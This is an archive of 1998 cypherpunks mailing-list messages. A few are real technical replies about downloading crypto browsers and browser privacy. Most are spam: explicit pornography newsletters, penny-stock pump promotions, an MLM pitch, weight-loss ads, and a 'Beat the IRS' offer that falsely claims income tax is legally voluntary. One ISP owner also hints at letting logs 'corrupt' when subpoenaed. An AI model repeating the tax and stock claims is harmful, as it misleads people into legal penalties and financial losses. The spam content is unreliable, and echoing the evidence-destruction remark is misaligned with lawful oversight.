Received: from basement.replay.com (basement.replay.com [194.109.9.44]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id HAA01675 for <cypherpunks@ssz.com>; Sun, 22 Feb 1998 07:14:56 -0600
Received: (from usura@localhost)
	by basement.replay.com (8.8.5/RePlay, Inc.) id OAA27880;
	Sun, 22 Feb 1998 14:02:18 +0100 (MET)
Date: Sun, 22 Feb 1998 14:02:18 +0100 (MET)
From: Alex de Joode <usura@REPLAY.COM>
Message-Id: <199802221302.OAA27880@basement.replay.com>
To: cypherpunks@toad.com, cypherpunks@ssz.com
Subject: Re: DLing from Replay.com
Newsgroups: list.cypherpunks
Organization: Replay Associates, LLP.
X-Newsreader: TIN [version 1.2 PL2]
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 937


In article <a7a15ef0e0850cd6298e5b6f0dd20958@squirrel.owl.de> you wrote:

: |Forbidden

: |You don't have permission to access /security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe on this
: |server.

: |There was also some additional information available about the error:
: |[Mon Feb 16 21:13:24 1998] access to
: |/pub/WWW/www.replay.com/security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe
: |failed for xxxxxx.xxxxx.xxxxx.xxx, reason: file permissions deny server execution 

My fault: the extension .exe is used for cgi-scripts @replay, so the
webinterface thinks that the file is a cgi script, and not a downloadable
archive so it tries to execute it which ofcourse doesnt work.

try the following URL:

ftp://ftp.replay.com/pub/crypto/browsers/128bit/

Sorry for the mess ..
--
  Alex de Joode | adejoode@REPLAY.COM | http://www.replay.com
	Replay Associates: Your Internet Problem Provider.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmumford@dmumford.com
Date: Thu, 26 Feb 1998 22:38:32 +0800
To: dstoler <dstoler@globalpac.com>
Subject: re: Request for Web Browser Information
Message-ID: <199802220544.AAA00515@speedy.dmumford.com>
MIME-Version: 1.0
Content-Type: text




Of course, you can always download a copy of NFR and watch as the traffic
passes.

Dodge

Original message:
Date: Sat, 21 Feb 1998 05:51:41 -0800
From: dstoler <dstoler@globalpac.com>
To: cypherpunks@toad.com
Subject: Request for Web Browser Information

I would like to know the information my browser makes available to web sites. I use both Netscape and 
Internet Explorer.

Obviously web sites can determine my IP address for any given session; they can also look at cookies left 
by themselves and other sites.

Can anyone point me to where I can learn exactly what other information is made available (browser 
version?, OS version?, system name?, user name?, etc.)?

Thanks in advance.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Wed, 25 Mar 1998 09:56:11 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: you petition who? (Re: I petition the Internet community to
In-Reply-To: <199803161100.LAA01168@server.eternity.org>
Message-ID: <3.0.3.32.19980223174554.0094906c@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain



So what do you need, E-mail, web space, shell?

We don't do shit until we get a subpoena, then those darned logs on the NT
server
well they just seemed to have corrupted themselves.

Course, this is NOT a invite to hack and fuck around with networks.  I'll
support objectionable content, not pricks.  No advocating violence against
people.

We host several of the white power sites referred to, we also host several
leftist political sites.
Right to freedom of the press goes beyond the government.  If private
business doesn't support freedom of the press, then there is no real freedom.

If any of you need accounts.  Drop a note.

Ian Briggs
President
Internet something or another.		


>> >   if Dmitri is not restored, deny access to his self-proclaimed
>> >   terminator: guy@panix.com
>
>Hardly in the spirit of free speech either, although I don`t doubt 
>Polis is a censorous cocksucker.
>
>> It wasn't the "internet community" that pulled that account, it was
>> PSInet, in response to Guy Polis' censorship attempts.
>
>Plug pulling is becoming even more rife, you may have noticed I have 
>been off the list for a few days, this was a result of content-based 
>plug pulling. It`s time more resilient methods of creating 
>censor-proof account were worked on, does anyone know of any ISPs 
>that specifically state that they refuse to censor? Clearly, such an 
>ISP would have limited commercial appeal in the current market so I 
>don`t consider it likely.
>
>
>--                  
>                            Paul Bradley 
>                      paul@fatmans.demon.co.uk
>       "Why should anyone want to live on rails?" - Stephen Fry
>
>
>
> 
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bpi@ns9.internetconnect.net
Date: Sun, 1 Feb 1998 03:26:14 -0800 (PST)
To: Friend@public.com
Subject: Being a Better Educator and Parent
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



Dear educator:

Today, more than ever, we need innovative new solutions to 
educational problems. 

        "Kevin Kirchman's book Aspirations is an answer 
        to education questions such as 'How do we teach 
        students to think for themselves, fulfill their 
        potential, be creative, gain self esteem, and be 
        ready for this productive world?'

        "His book is a must for all educators from pre-school
        through graduate school. I wish his book had been
        available during my 42 year teaching career."
                 Norma Silver
                 Retired teacher, Fort Lee, NJ

Introducing,
         Aspirations: The Rational Foundations of Achievement. 

The reason it is possible to have an entirely new perspective on
educational issues is because the theory behind education, called
epistemology, or the theory of knowledge, has _not_ been an empirical
science.

Epistemology is to education what physics is to engineering--
but until the basis was discovered for _principles_ of understanding,
there could be no science, and no applications that would radically
transform educational practices. 

That is until now.

        "If knowledge of the humanities is subjective, that is,  only
        valid  for the person who holds it, of what value is
        education?

        "Knowledge is not subjective. There are some conceptual 
        models that are better--more accurate and enlightening--
        than others."
                Aspirations

Aspirations will show you why, and teach you precisely how to tell the
difference. 

        "[Aspirations] lays out the foundations of clear,  critical
        thinking, that can help us to better understand ourselves,
        others, and the world around us. In the final analysis, we are
        all decision makers. Don't make many more important decisions
        before you read and grasp Aspirations."
                Frank L. David
                        Co-Principal, Business Learning Centers
                        Murrieta, CA

Perhaps the last earthly frontier, the mind, has been finally
penetrated by this wonderful new book. Aspirations won't give
you old ideas about the mind that you've seen before. It's 
radically new.

Aspirations shows how, because of an old philosophical problem, 
educators are unwittingly discouraging idea forming habits that 
occur through the mental process of induction, or generalization. The
book shows how these inductive concepts are the basis of all abilities
and character. 

Deterring concept formation has the effects of hindering 
individuality, stifling general competency and causing people to be
more dependent upon the ideas formed by others (being less able to
form them themselves). The book presents a new solution to this
dilemma which describes the mental events that occur during concept
formation that can be practiced and made habit.

Aspirations makes it clear that if you are less able to form 
concepts of your own, you necessarily have to borrow those formed by
others. This discourages individuality, creativity, and self-reliance.
It is also the basis for a host of psychological problems, from
prejudice and intolerance to low self-esteem. 

Set within the context of human intellectual history, Aspirations stands out as a unique and controversial contribution to our understanding of ourselves. 

        Fascinating reading. A journey deep into the corners of the
        mind and down the paths of civilization's  philosophical
        development. 

The author of Aspirations, Kevin Kirchman, a Cornell University
educated Artificial Intelligence scientist, lecturer and businessman,
has actually utilized his new understanding of innovation to develop
original perspectives on

        * deduction, or what reasoning is
        * induction, the basis of all innovation and creativity
        * character formation

and these new ideas genuinely will aid you not only in teaching
better mental habits, but in improving your own. 

        "[Aspirations] is a self-motivational book for  intelligent
        people."
                Stan Irwin
                        The Producer of the Tonight Show
                        with Johnny Carson for 15 years

Rarely in human history is a book produced which has as important
implications. Rarely is a book offered which gives us such hope and
inspiration.

Aspirations will soon be promoted nationally by Rogers & Cowan,
America's largest public relations firm. Be the first to learn and
apply these revolutionary new insights. 

                 Table of Contents:
        1    Introduction
        2    The Problem -- Why Educational Philosophy is
                 Psychologically Debilitating
        3    Concepts -- The Key to Understanding the Mind
        4    Descriptive Concepts -- The Foundation of Clear
                 Thinking
        5    Creating Ideas -- Concept Formation is Induction
        6    Character -- The Conceptual Origins of Personal
                 Qualities
        7   Motivation -- A Theoretical Defense of the
                 Principles of Achievement
        8   Reasoning -- A New and Practical Overview
        9   Goal Setting and Decision Making -- Giving
                 Yourself a Purpose
       10   Deduction -- The Connection Between Logic and
                 Common Sense
       11   Reasoning Well -- Applying the New Science of Logic
       12   The Principles of Induction -- New Solutions
                 to a Classical Challenge
       13   Conceptual Modeling -- Coming Up with the Best
                 Concepts
       14   Teaching Induction -- Overcoming the Fear of
                 Abstractions
       15   Philosophical Clarifications -- Understanding
                 the Breakthrough and Replacing Outdated
                 Technology
       16   The New Science of Logic -- Clearing the Way for a
                 Revolution in Rationality
       17   Historical Background and Philosophical Comparison --
                 Putting the Conceptual Model Theory Into
                 Perspective

If, after receiving "Aspirations", you are not completely
satisfied, return it for a prompt and full refund.

Only $16.95 plus $3.50 postage and handling
For orders of 2 or more, p&h is free. 

ORDER Aspirations NOW by calling USA 

                 International	1 310 289-2394,
                 or faxing to 	1 310 854-1840
any time with your credit card details.

Or, Mail Check, Money Order, or Credit Card details to:
        Breakthrough Publishing, Inc.
        291 S. La Cienega Blvd., Suite 107
        Beverly Hills, CA 90211

YES! __ I would like ____ copies of Aspirations * $16.95 = __________
           + $3.50
        = __________

Name ________________________________________
Title __________________
Organization_________________________________
Mailing Addr ________________________________
_____________________________________________
City ___________________ State ______________
Post Code ____________
Country ___________________________

VISA ___   MasterCard ___   American Express ___ Discovery ___

Card #	__ __ __ __   __ __ __ __   
   __ __ __ __   __ __ __ __ 

Expiration Date __________

Signature _________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 1 Feb 1998 01:42:07 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Feb 1 '98
Message-ID: <19980201082849.16255.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

UNFAITHFUL
Just once in a while  a brand new site comes along that will
blow your mind,  and Unfaithful  is one of them.  Brought to
you by two  of the biggest  names on the web,  Intertain and
Playgal,  it offers MORE than both sites put together, which
includes  an amazing  3,000 video feeds - yes,  thousands of
hot, streaming videos, many totally live, and some even with
audio too!  With it's FREE trial offer don't miss this site!
Unfaithful ... http://www.unfaithful.com/banner_Eureka0.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
CyberErotica - Where Fantasy Meets Reality!
http://www.cybererotica.com/ad/welcome.cgi/raw_4006
CyberErotica now offers a free one week membership. We
currently have 1000s of videos and many 1000s more photos
and a whole lot more. Try us FREE for a week.

DONNA'S TIGHT BEAVERS
We aren't sure how tight they are, in fact some of them look
pretty loose!  There are  asian, older, tits and more.  Easy
to find thumbnail images.  Quick loading images.  It's free!
Donna's Tight ..... http://www.megaservices.com/adult/donna/

THE ROSEGARDEN
What can we say about this one?  There are some free images,
they load pretty quick.  Blowjobs,  teens, amateurs and even
bikini pictures.  The nudie pictures are pretty good.  Yeah!
The Rose ..... http://www.undergroundnet.com/rosegarden.html

QUICK LIXXX  
We have  some great  facial pictures here!  Women with juice
on their faces, chins and  tounges.  Just where you like it!
Take your best shot and surf over to this website.  Load it!
Quick Lixxx ......... http://xxx.shots.com/~babyoil/sb1.html

ELFY'S SMUT SHACK
This website took some time to load, but once it did I found
some of the hottest  looking women on the internet!  See the
woman in the red dress. Lots of hot images.  Worth the wait.
Elfy's Smut Shack ........... http://www.elfyssmutshack.com/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Hardcore -----------------------> http://204.244.215.7/anal/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY

---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
XXXStories.com: The largest free  erotic  story  site on the
net. Over 400 hot sex stories  on such topics as wife sluts,
virgins, group sex and more...... http://www.xxxstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?010
Pic  2 --------------------------> http://137.39.63.229/?011
Pic  3 --------------------------> http://137.39.63.229/?012
Pic  4 --------------------------> http://137.39.63.229/?013
Pic  5 --------------------------> http://137.39.63.229/?014
Pic  6 --------------------------> http://137.39.63.229/?015
Pic  7 --------------------------> http://137.39.63.229/?016
Pic  8 --------------------------> http://137.39.63.229/?017
Pic  9 --------------------------> http://137.39.63.229/?018
Pic 10 --------------------------> http://137.39.63.229/?019

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jaqui5535@juno.com
Date: Sun, 1 Feb 1998 07:18:07 -0800 (PST)
To: smartinvestors3@newsletter.com
Subject: Re: E-ALERT: URGENT BUY RECOMMENDATION
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Cronus Corporation
Symbol: C R O N
Recent Price: 1/2 ($.50/share)

Wall Street analysis from Harvard Equity Research has issued a
STRONG BUY recommendation on CRON stock.  Charles Blitzer
was quoted as predicting a $1.25 to $1.50 price near-term
with a "thrust into the $3-$4 range sometime in 1998".

Harvard Equity Research's last recommendation in October, AATK,
went from $3 1/2 to $9 in ten trading days!

Harvard Equity Research is so confident of their projections that
they are offering their subscribers a money-back guarantee on their
subscription if CRON doesn't at least double within the next year.

To reiterate: an IMMEDIATE & STRONG BUY recommendation
on CRON.

For further information go to: http://quote.yahoo.com/
or send a SASE, for a free issue of Harvard Equity Research's
latest top-rated newsletter, to H.E.R., P.O. Box 96159,
Boston, MA 01742

-------------------





























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Tue, 3 Feb 1998 19:33:20 -0800 (PST)
Subject: FDA Registered and FDA Certified
Message-ID: <199802011811.MAA23195@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


Exclusive New Oral Transmucosal
Weight Control Disc & Transdermal
Patch, both FDA Certified & Registered
with National Drug Code #'s.  Developed
by 10 year old Pharmaceutical Company.

For detailed information reply to: timcoent@usa.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Wed, 4 Feb 1998 08:41:00 -0800 (PST)
Subject: FDA Registered and FDA Certified
Message-ID: <199802011821.MAA25009@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


Exclusive New Oral Transmucosal
Weight Control Disc & Transdermal
Patch, both FDA Certified & Registered
with National Drug Code #'s.  Developed
by 10 year old Pharmaceutical Company.

For detailed information reply to: alt@sierranv.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 10666148@08855.com
Date: Sun, 1 Feb 1998 12:18:43 -0800 (PST)
To: Friend@public.com
Subject: WANT TO KNOW A SECRET??
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


STOP EVERYTHING!

WE  PAY  FOR  YOU  TO  JOIN !

THE BUSINESS OPPORTUNITY:
    No other organization has our technology!
    Our products are needed in almost every home and business. They
  are currently in less than 2% of U.S. homes and very few  businesses.
    Significant commissions (over 40%) can be made from retailing
  alone.

THE MLM OPPORTUNITY:
    Your sponsor pays your $163 startup costs. You receive 3 high-tech
  products worth $1200 with zero money down.
    You sponsor one person, we approve a $1,200 check for you, you
  pay their $163 startup costs, and start receiving large commissions, and
 up to 42% residuals from your downline.
     PLUS - Well show you how to get qualified prospects eager to
  learn your money-making secret!

Bill Gates said that the secret to his success was being in the right place
at the right time. For our company (and you), this is it!

         CALL THE FOLLOWING TOLL FREE NUMBER.
              IT MAY CHANGE YOUR LIFE!!!

     Three minute recorded message:  1-800-481-3181
            There are also live Conference Calls

As soon as youre convinced about the great company, the state of the art
products, the enormous market potential, and the huge MLM opportunity,

        1. Dial Fax on Demand (409-988-0413) (press 9 during greeting
  message, then *, then 1) for additional information, or
        2. Leave a voice message (409-988-0413), or, if lines are busy,
        3. Respond by e-mail to alphaenterprises@yahoo.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moisoqa@prodigy.com
Date: Sun, 1 Feb 1998 07:05:23 -0800 (PST)
To: moisoqa@prodigy.com
Subject: "Stock News ALERT" UNFC expect $50 million increase in revenues in 98'.
Message-ID: <199802013862HAA16945@post.at>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE>
</P><P ALIGN=CENTER><FONT  COLOR="#000000" SIZE=3><B>
REMINGTON-HALL CAPITALIZES ON RESURGENT REAL ESTATE MARKET 
Company expects to acquire $50 million in assets by mid-1998</B>
</P><P ALIGN=LEFT>  
DALLAS --<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>), a diversified real estate investment firm formerly known as Universal Fuels Company, is quietly acquiring over $50 million in previously undervalued, undercapitalized or mismanaged commercial properties and making this new major player<FONT  COLOR="#0080ff" SIZE=3><B> </FONT><FONT  COLOR="#000000" SIZE=3></B>one of the best moderate-risk real estate investments in 1998.  
 
Founded in 1975 as Universal Fuels, the company provided uranium to the world as an alternative fuel, but as uranium became less used as a nuclear fuel source than other more economical and useful materials, Universal Fuels' stock declined almost to extinction over several years.  The stock price was less than 1 last year.
 
Four months ago officials from Camden-Townwest, a privately held real estate investment firm, approached Universal Fuels former management about converting Universal Fuels into a publicly traded real estate conglomerate.  Camden-Townwest, founded in 1994, grew from $19,000 in cash to $3 million in assets in three years without seeking any outside capital.  Since the change in management and corporate mission last October, <FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> <FONT  COLOR="#0080ff" SIZE=3></B> </FONT><FONT  COLOR="#000000" SIZE=3>has seen its stock value increase by over 800%.   
 
Remington-Hall  is now making its move to increase assets at a tremendous rate.  By mid-year management expects to acquire in excess of $50 Million in office buildings and multi-family properties at a significant discount to their market value. "We have been referred to as 'Cat Burglars of Real Estate'," said Douglas Fonteno, president & chief executive officer, "and that's a title we plan to keep."
 
<U><B>Douglas T Fonteno</U> </B>previously Chairman of Camden-Townwest and formerly with Merrill Lynch, is Remington-Hall's new President & Chief Executive Officer.  <U><B>Larry Hood</U></B>,  <B> </B>formerly Chief Operating Officer of Pizza Inn and Chief Financial Officer of Reliance Mortgage Company, is Remington-Hall's Chief Financial Officer, giving the new company immediate and substantial financial integrity.  <U><B>Wade Hyde</U></B>, previously public relations and investor relations executive for Blockbuster Video and FoxMeyer Corporation, is Vice President of Marketing & Public Relations. 
 
Currently Remington-Hall<FONT  COLOR="#0080ff" SIZE=3> </FONT><FONT  COLOR="#000000" SIZE=3>is seeking to be listed on the Pacific Stock Exchange and the Nasdaq National Market.  The company anticipates announcing over $10 million in newly acquired assets by the end of January.
 
<B>Name:</B>		    Remington-Hall Capital Corporation  ( formerly Universal Fuels)
<B>Symbol:</B>	     Nasdaq:<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>
<B>Mission:</B>	     To aggressively acquire steeply undervalued real estate properties
                       due to previous mismanagement or undercapitalization.   
<B>Management: </B>Senior executives with diverse experiences, including: 
                       Fortune 500 corporations, leading stock brokerage firms, 
                       real estate companies and national marketing.  
<B>Goals:</B>	           To increase assets to $10M by January 98 and $50M by mid-year  
<B>Address:</B>	     1401 Elm St., Ste. 1818, Dallas, TX  75202-2925
<B>Internet:</B>	     www.remington-hall.com <FONT  COLOR="#0080ff" SIZE=3><B>
</FONT><FONT  COLOR="#000000" SIZE=3>E-Mail:</B>	         <FONT  COLOR="#0080c0" SIZE=3><B>  </B>InvestorRelations@remington-hall.com<FONT  COLOR="#0000ff" SIZE=3>
</FONT><FONT  COLOR="#000000" SIZE=3><B>Quote:            </B>Yahoo! Remington-Hall<B> </B>

              Except for the historical information contained on the website,
              the matters set forth inthese documents are forward-looking
              statements within the meaning of the "safe harbour" provisions
              of the Private Securities Litigation Reform Act of 1995. These
              forward-looking statements are subject to risk and uncertainties
              that may cause actual results to differ materially. These forward-looking
              statements speak only as of the date hereof and the Company 
              disclaims any intent or obligation to update these forward-looking 
              This is not a solicitation to buy or sell securities and does not purport to
              give investment recommendations.  The company featured in this                      
              advertorial pay for promotional services by issuing securities, options to
              purchase securities and/or cash.  The information contained here has
              been carefully compiled and believed to be reliable, but its accuracy is
              not guaranteed.


<FONT  COLOR="#000000" SIZE=3>
</PRE>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TheSluth@kokomocowboy.com
Date: Sun, 1 Feb 1998 21:22:25 -0800 (PST)
To: WiseFolk@UwiseFolk.com
Subject: Beat The IRS & PAY-NO-MORE
Message-ID: <99235798_35664352>
MIME-Version: 1.0
Content-Type: text/plain



*****************************************************************
  - PLEASE IGNORE THE 1st MESSAGE IF YOU LIVE OUTSIDE THE USA -                       

              BEAT-THE-IRS & PAY-NO-MORE
              --------------------------

Our PACKAGE, (Beat The IRS & PAY-NO-MORE) will teach you
EXACTLY how to EASILY:
           STOP FEDERAL Income Tax Withholding,
             STOP April filing of 1040 Form,
                           & 
            STOP THE IRS EXTORTION PERMANENTLY
            ----------------------------------
The IRS Federal Income System is based on VOLUNTARY COMPLIANCE...
We will teach you how to legally VOLUNTEER OUT OF THE SYSTEM!

                        - PLEASE READ -                     
                        ***************
    The Founding Fathers of The United States of America wrote
our Constitution, Bill of Rights and Declaration of Indepen-
dence to set us FREE from TYRANNY and TAXATION.

    Our Founding Fathers did not want our government to make you
pay INCOME TAXES. If you study the Constitution, and the IRS tax
laws, you will find that paying income taxes is not mandatory. 
It is based on a voluntary system. The LAWS and the SUPREME COURT
and the IRS have ruled that Federal income taxes are VOLUNTARY
and FILING A RETURN IS NOT REQUIRED in many cases if you properly
VOLUNTEER OUT OF THE SYSTEM AND THEIR JURISDICTION..

"Our tax system is based on individual self assessment and
VOLUNTARY COMPLIANCE." - M. Caplin, IRS Commissioner

"OUR TAX SYSTEM IS BASED UPON VOLUNTARY ASSESSMENT AND PAYMENT
AND NOT ON DISTRAINT" -Supreme Court Ruling, Flora v. U.S.,
362 U.S. 145

    It is very EASY and LEGAL to volunteer out of the IRS tax
system, but you must know the EXACT PROCESS REQUIRED to do this
simple task. If you don't know the correct way to do this, you
could be FINED $500 by the IRS.

    If you will spend JUST $35.00 we will send you our report:
"BEAT THE IRS & PAY-NO-MORE". Our report will SET YOU FREE 
LEGALLY! 

After reading our wonderful report and filling out a simple form
you will be FREE from the IRS BANDITS and the graduated Federal
INCOME TAX ...FOREVER. Our report is guaranteed to STOP FEDERAL
INCOME TAX WITHHOLDING from your pay check!!! You will never have
to pay Federal income taxes again. You will never have to file a
1040 Form again. You will never have to keep personal expense or
income records. You will be completely FREE from the Federal 
income tax and the IRS. We send you absolute PROOF.

After reading our report and following simple instructions your
pay check will be free from those nasty income tax deductions. 
This will put an extra $20 to $200 in your pocket every week!.
ISN'T IT ABOUT TIME YOU GET PAID WHAT YOUR WORTH?

	Now is the time to fight back. Please read on!!!
*****************************************************************
Your Success is ABSOLUTELY unconditionally GUARANTEED if
your were BORN in and LIVE in one of the 50 Republic States
  (((((( & DON'T WORK FOR A GOVERNMENT AGENCY.)))))
Our methods work every time for everybody. They are 100% legal, 
honest and ethical. We will pay anybody $1,000 if they can 
prove our method is ILLEGAL, DISHONEST or UNETHICAL!!! Our
method has worked for every person who has ever bought this
package without exception. NOBODY HAS EVER FAILED OR ASKED FOR
A REFUND!!!
            
- Our PACKAGE includes a LIFETIME, FREE, 50% PAY OUT Dealership,
PLUS ALL the marketing material master copies you will ever need.
YOUR PAYCHECKS WILL BE 10% TO 30% BIGGER EVERY WEEK, within 2
weeks of filing the proper forms and affidavit. WHY NOT GIVE 
YOURSELF A RAISE THIS YEAR BY EXERCISING AND ENJOYING MORE OF
YOUR CONSTITUTIONAL RIGHTS. SET YOURSELF FREE!

Your package includes unlimited FREE phone consultations, a copy
of the U.S. Constitution, The Bill of Rights, forms, affidavits,
and much,  much more!

TO ORDER BY MAIL: Send a $35 Money Order to:
LINKO --Dept. #1-BEAT-IRS,  POB 66781 -- Phoenix, AZ 85082

To order by phone and Fax Check call our office at (602)267-9688
between the hours of 2 and 11pm Mountain Standard Time. You may 
also call just to ask questions. Thanks for reading this message!

Dealer #00001 
- (Unconditional Money Back Guarantee) - - Copyright 1996 Linko -
*****************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 2 Feb 1998 03:32:12 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Feb 2 '98
Message-ID: <19980202083303.6713.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
LOOKING FOR *FREE* SMUT? - SEXY SAMANTHA REVEALS ALL!
http://209.50.232.36/sexysam/
I'm Sam and I've searched the web for only the very best
*FREE* adult sites. None of these are preview areas for pay
sites, or adult verification sites. Just surf and find
thousands of the hottest photos, mpegs and audio that you'll
find anywhere on the web!

SULTRY WOMEN
This website features two  galleries of hot sexy women.  The
images are high  quality and load fast.  There are not a ton
of photos, but the ones that are here will perk up your hog.
Sultry Women ........... http://www.allthebeauty.com/sultry/

TITANIC TITTIES
If you like women with big boobs then this is the place. The
woman they feature has two of the biggest breasts I have out
on the internet.  Huge white tits in a lot of poses and bush
too!  You would be crazy to not see her melons.  It is free!
Titanic Titties ............... http://209.81.0.172/titanic/

WILD BANANAS
Have a banana?  If you do not just go here you will see one.
This fruit is right between her legs. This might make for an
interesting  glaze.  Large high  quality jpeg images.  There
are a lot of free pictures here.  Spreads, blondes, lesbian,
toys, teens, and black.  Get wild yourself and check it out!
Wild Bananas ................... http://www.wildbananas.com/

WAITING WOMEN
You have to click your  mouse around a few banners but there
are  free pictures  through out the  website.  These feature
young looking asians, blondes and and exotic looking ladies.
Waiting Women ..................... http://www.khans.com/ww/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Ass fucked teens ---> http://207.240.169.120/anal/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY

---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Erotic  Sex  Stories:  Free  sex   stories  in  5  different
subjects, and the stories are  illustrated with hardcore XXX
pics! You'll love it! ..... http://www.eroticsexstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?020
